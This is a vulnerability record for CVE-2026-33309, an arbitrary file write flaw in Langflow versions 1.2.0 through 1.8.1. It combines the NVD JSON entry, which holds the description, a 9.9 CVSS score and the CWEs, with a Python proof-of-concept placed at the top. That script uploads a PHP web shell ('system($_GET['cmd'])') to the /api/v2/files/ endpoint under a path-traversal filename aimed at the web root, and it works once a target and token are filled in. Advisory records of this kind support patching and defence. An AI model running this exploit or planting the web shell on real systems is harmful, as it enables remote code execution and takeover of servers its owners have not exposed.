CVE-2026-33309

import requests # Target URL (replace with actual target) url = "http://target-host:3000/api/v2/files/" # Attacker's authentication token (Low privilege required) headers = { "Authorization": "Bearer <LOW_PRIVILEGE_TOKEN>" } # Malicious payload to write a webshell or backdoor # The filename contains path traversal to bypass validation payload_content = "<?php system($_GET['cmd']); ?>" # The filename attempts to write outside the intended directory files = { "file": ("../../var/www/html/shell.php", payload_content, "application/octet-stream") } try: response = requests.post(url, headers=headers, files=files) if response.status_code == 200: print("[+] Exploit successful! File written.") else: print(f"[-] Exploit failed. Status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

{"cve": {"id": "CVE-2026-33309", "sourceIdentifier": "[email protected]", "published": "2026-03-24T13:16:02.983", "lastModified": "2026-03-24T19:17:15.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Langflow is a tool for building and deploying AI-powered agents and workflows. Versions 1.2.0 through 1.8.1 have a bypass of the patch for CVE-2025-68478 (External Control of File Name), leading to the root architectural issue within `LocalStorageService` remaining unresolved. Because the underlying storage layer lacks boundary containment checks, the system relies entirely on the HTTP-layer `ValidatedFileName` dependency. This defense-in-depth failure leaves the `POST /api/v2/files/` endpoint vulnerable to Arbitrary File Write. The multipart upload filename bypasses the path-parameter guard, allowing authenticated attackers to write files anywhere on the host system, leading to Remote Code Execution (RCE). Version 1.9.0 contains an updated fix."}, {"lang": "es", "value": "Langflow es una herramienta para construir y desplegar agentes y flujos de trabajo impulsados por IA. Las versiones 1.2.0 a 1.8.1 tienen un bypass del parche para CVE-2025-68478 (Control Externo del Nombre de Archivo), lo que lleva a que el problema arquitectónico raíz dentro de 'LocalStorageService' permanezca sin resolver. Debido a que la capa de almacenamiento subyacente carece de comprobaciones de contención de límites, el sistema depende completamente de la dependencia 'ValidatedFileName' de la capa HTTP. Este fallo de defensa en profundidad deja el endpoint 'POST /api/v2/files/' vulnerable a la escritura arbitraria de archivos. El nombre de archivo de la carga multipart omite la protección del parámetro de ruta, permitiendo a atacantes autenticados escribir archivos en cualquier lugar del sistema anfitrión, lo que lleva a la ejecución remota de código (RCE). La versión 1.9.0 contiene una corrección actualizada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-73"}, {"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.2.0", "versionEndExcluding": "1.9.0", "matchCriteriaId": "54961FCE-8971-4CCF-8E68-7B571195DFCD"}]}]}], "references": [{"url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-g2j9-7rj2-gm6c", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}